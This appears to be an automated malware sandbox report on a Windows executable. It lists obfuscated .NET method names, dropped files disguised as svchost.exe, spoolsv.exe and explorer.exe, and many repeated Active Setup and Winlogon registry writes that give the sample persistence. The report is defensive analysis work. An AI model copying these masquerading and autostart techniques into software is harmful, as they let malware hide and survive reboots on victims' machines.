Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, IVSpxYrZAcwvgtENiP.cs	High entropy of concatenated method names: 'd0RTiZQ4fi', 'Eq0TbACq5n', 'qb0TcCB9it', 'TyiTGiutFZ', 'TJATV09kv8', 'mxuTpXpV4k', 'VFGTyRjIaQ', 'wTVT0KlIAf', 'sfbT5k6ieI', 'z2yTW3J8KW'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, UobgjMasyVIU7rqwWS.cs	High entropy of concatenated method names: 'd94SPu58SG', 'kaMSYTRbRe', 'YBxxegVLUu', 'biKxhP7eiL', 'y35Su37gPd', 'GTBSkjCAdw', 'RkcSfwUW1i', 'Y18SFviCZN', 'fcQSRLJfbx', 'gheSjnSquR'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, HGH9Iq33EZG8dJvbWh.cs	High entropy of concatenated method names: 'I3XZComjGI', 'wUNZnHHLC2', 'gCJZdXyxav', 'fUTZJLAWo9', 'EOEZIfJy9C', 'edQZq2lulQ', 'V3hZTyBPCY', 'eEAZ3MAGbO', 'MbFZw7N8Bn', 'SO4ZgnYnpR'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, POwu1GMQ2qfqVYeuiX.cs	High entropy of concatenated method names: 'XT8q2Nd69d', 'DRtqi30gvl', 'uQrqcn0UsD', 'ELTqGfFCj5', 'TfmqpsEVnQ', 'pkyqyTaIZY', 'Ix8q5cHoL8', 'dnvqWeT71x', 'wqrFL9J9gXaWoaw9aiT', 'tVJ2XEJDwt4eRCyCOJi'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, EGsCHQ6Y8H9XCQxi4J.cs	High entropy of concatenated method names: 'FG8qCdNwm5', 'ie4qduxthe', 'peCqIsfmJN', 'UXbqTrSft4', 'kxdq3xSvP3', 'WmjIQXTn2T', 'j8sIaTQJQk', 'LbZI4e50yG', 'Ai3IPJsy1F', 'hxoI9Md14w'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, AIqgZG0gKMSon9iYZP.cs	High entropy of concatenated method names: 'tTSdF1wsV6', 'TtddRmN2XT', 'Cbvdj0RLPq', 'APJdo11nXj', 'VdEdQJ8cCD', 'n2Dda6PTCe', 'wp8d4kIZkf', 'juWdPXmQ2P', 'wlHd95YsqN', 'RwGdY7e2Ej'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, HhdQBrsaVnI1ptfqyF.cs	High entropy of concatenated method names: 'TNxcQZcw2', 'bXHGV3erA', 'PwJpxd4RR', 'DdryDigaT', 'PNb5rJy02', 'icCWHrrTc', 'e2x0ATLPnI3dAYNIqA', 'ofvehWigEZsEjDVy1J', 'u02gExfDL0XBqFAquc', 'a2ixiShgw'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, sjVILQOdykDXAoGrmO.cs	High entropy of concatenated method names: 'DKGhTIqgZG', 'lKMh3Son9i', 'BiwhgXGmNw', 'yZ1hHNBfS2', 'jKChA8H5Gs', 'eHQhUY8H9X', 'swobT08XDcE0ZdAnKh', 'PBr7SyIZ6Ol2mTsgDS', 'WPXhhsFUUX', 'Xq8hZM8nSU'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, ejZPweKiAhYOWYuIF1.cs	High entropy of concatenated method names: 'SagTnfsc1k', 'nNWTJNhI9C', 'hSSTqch8hY', 'hPgqYMKMdR', 'RU5qzcGpDH', 'sO0TeqLKnH', 'kcfTh9iGO2', 'wemTsGWNra', 'pwPTZtWF40', 'MLvTOtMFip'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, k9RjpMdhWsnYyLSoC2.cs	High entropy of concatenated method names: 'Dispose', 'qWFh918UpG', 'Gjts7JxXmB', 'laDtEhpPsl', 'iiNhYrHU5u', 'fgehzqcX6y', 'ProcessDialogKey', 'Q9DsehYoGn', 'Cyesh5wQu1', 'Ix3ssnbqpm'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, ReOjl3zue1oxOKQHeM.cs	High entropy of concatenated method names: 'W1dDpN7oiJ', 'KHGD0Z65xP', 'ycQD55r8fJ', 'mOGD6fkI1U', 'Y3rD7yfjJ6', 'TPDDMh4Kmb', 'QXCDEIZtHy', 'DrID2CCwrh', 'USwDiSLiEV', 'JweDbIt9vC'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, fQEIup5iwXGmNwbZ1N.cs	High entropy of concatenated method names: 'Ee2JG3ZAof', 'egDJpWZcHX', 'DNvJ0FumT3', 'rx6J50uB7w', 'ao4JAH9r1D', 'bTjJUPEv9n', 'C93JSaihep', 'R9QJxhUveO', 'XiXJmnXurJ', 'lesJDROx5y'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, DkQOkDjjhFELpuLZlA.cs	High entropy of concatenated method names: 'ToString', 'FHWUu2JKUh', 'KDIU79trVd', 'wRVUN2K1u4', 'GSoUMdY4ig', 'd9tUE5OiJ9', 'WYqULA3B1k', 'gCkUK9GJKd', 'iXeUl0gunI', 'av8Ur5GssO'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, thYoGn9yye5wQu1Nx3.cs	High entropy of concatenated method names: 'vGfm6F5V2j', 'KWTm7dWJxm', 'IdDmNGJZwp', 'DepmMSO8cK', 'iXAmEsQB7S', 'wb0mL80iui', 'kw9mK9Lw98', 'tBhml5RHaF', 'U37mr4pggr', 'xw8m8NAQ44'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, fbqpmXYUo3K1dEpIm9.cs	High entropy of concatenated method names: 'Ks5DJNYkqw', 'E4XDIeCOqY', 'CthDqIPOHP', 'aqmDTYBKHP', 'FLVDmTrlGO', 'tMtD3dL5Ag', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, ke6d684Y2SWF18UpGI.cs	High entropy of concatenated method names: 'mnOmAvSwaT', 'n4HmSIQbmw', 'BZbmmmpN1E', 'mUKm1mkTj2', 'EMomBRm8gM', 'fAfm2BgY6J', 'Dispose', 'dLqxnR6nwO', 'H3uxdKJkaH', 'PwjxJPEpvu'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, bU5DeOhhBxfmiGFE8aN.cs	High entropy of concatenated method names: 'NfMDYsG0kP', 'cugDzofYRw', 'GuD1eRp3MY', 'lK01hQWN9G', 'tty1slxHH0', 'eXD1ZHGEY2', 'smj1ObN9hX', 'OJE1CFXfI8', 'lQp1n4M9Gd', 'idw1dJSJXN'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, APZRUZffCTZcoKWHmM.cs	High entropy of concatenated method names: 'ks8v0LhuHZ', 'R3Cv5qgwcA', 'jfgv6Mvy4T', 'bc1v7bE1Oo', 'CMVvMrsWsJ', 'ofnvEk7XY6', 'SRBvK4hdda', 'JV2vlpSj2V', 'Op1v8xUbcB', 'DEtvuXa1wE'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, kHyqdIouZVhvwbUKZL.cs	High entropy of concatenated method names: 'oqhSgIXYNi', 'uPlSHPVvc0', 'ToString', 'WZISny7aBQ', 'H7NSd1flb6', 'HkBSJRkRMY', 'bTfSIKHkhl', 's9ySqlFI31', 'ecdSTY2Xf4', 'sKRS3mYwBB'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, VFTUYyheGBKd7fl1dev.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AQaDuYTtsL', 'ISXDkcgGdx', 'gNnDfIKdo8', 'A3PDFhJ7B3', 'qmgDRt4mne', 'w5ADjTXcLY', 'IEADonKeA7'
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, evrJaOhOOv1r64DKIc0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XMtXmXxnW0', 'NpnXDBVSQS', 'T10X1S8qWe', 'B1LXXd3Yx5', 'rXeXBBQ6SA', 'jxVXtMM7jT', 'S44X2OFtIS'

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Windows\System\spoolsv.exe	File created: C:\Windows\System\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\System\explorer.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\System\spoolsv.exe	Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System\svchost.exe	Executable created and started: c:\windows\system\spoolsv.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Executable created and started: c:\windows\system\explorer.exe
Source: C:\Windows\System\spoolsv.exe	Executable created and started: c:\windows\system\svchost.exe	Jump to behavior

Source: C:\Windows\System\spoolsv.exe	File created: C:\Windows\System\svchost.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Users\user\AppData\Roaming\mrsys.exe	Jump to dropped file
Source: C:\Windows\System\svchost.exe	File created: C:\Users\user\AppData\Local\stsys.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\System\explorer.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\System\spoolsv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	File created: C:\Users\user\AppData\Roaming\dUENcAj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	File created: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	File created: C:\Users\user\AppData\Roaming\duencaj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	File created: C:\Users\user\AppData\Local\icsys.icn.exe	Jump to dropped file

Source: C:\Windows\System\spoolsv.exe	File created: C:\Windows\System\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\System\explorer.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\System\spoolsv.exe	Jump to dropped file

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	File created: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	File created: C:\Users\user\AppData\Roaming\duencaj.exe			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\System\explorer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath	Jump to behavior
Source: C:\Windows\System\explorer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath	Jump to behavior
Source: C:\Windows\System\explorer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon shell	Jump to behavior
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
